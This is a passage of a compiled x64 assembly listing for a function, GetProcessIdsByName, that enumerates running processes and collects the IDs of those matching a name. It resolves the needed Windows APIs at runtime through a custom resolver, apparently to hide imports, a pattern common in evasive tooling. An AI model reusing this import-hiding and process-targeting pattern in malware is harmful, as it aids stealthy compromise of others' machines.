	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 156
	mov	rax, QWORD PTR pProcess32FirstW$[rsp]
	mov	QWORD PTR tv132[rsp], rax
	lea	rdx, QWORD PTR pe$[rsp]
	mov	rcx, QWORD PTR hSnap$[rsp]
	call	QWORD PTR tv132[rsp]
	test	eax, eax
	je	SHORT $LN6@GetProcess
$LN4@GetProcess:
; Line 160
	mov	rdx, QWORD PTR processName$[rsp]
	lea	rcx, QWORD PTR pe$[rsp+44]
	call	?CompareStringW@@YA_NPEB_W0@Z		; CompareStringW
	movzx	eax, al
	test	eax, eax
	je	SHORT $LN7@GetProcess
; Line 162
	mov	rax, QWORD PTR maxCount$[rsp]
	cmp	QWORD PTR count$[rsp], rax
	jae	SHORT $LN7@GetProcess
; Line 164
	mov	rax, QWORD PTR outPids$[rsp]
	mov	rcx, QWORD PTR count$[rsp]
	mov	edx, DWORD PTR pe$[rsp+8]
	mov	DWORD PTR [rax+rcx*4], edx
	mov	rax, QWORD PTR count$[rsp]
	inc	rax
	mov	QWORD PTR count$[rsp], rax
$LN7@GetProcess:
; Line 169
	mov	rax, QWORD PTR pProcess32NextW$[rsp]
	mov	QWORD PTR tv147[rsp], rax
	lea	rdx, QWORD PTR pe$[rsp]
	mov	rcx, QWORD PTR hSnap$[rsp]
	call	QWORD PTR tv147[rsp]
	test	eax, eax
	jne	SHORT $LN4@GetProcess
$LN6@GetProcess:
; Line 172
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv152[rsp], rax
	mov	rcx, QWORD PTR hSnap$[rsp]
	call	QWORD PTR tv152[rsp]
	npad	1
; Line 173
	mov	rax, QWORD PTR count$[rsp]
	mov	QWORD PTR $T2[rsp], rax
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	mov	rax, QWORD PTR $T2[rsp]
$LN1@GetProcess:
; Line 174
	add	rsp, 752				; 000002f0H
	pop	rdi
	ret	0
?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z ENDP		; GetProcessIdsByName
_TEXT	ENDS
END
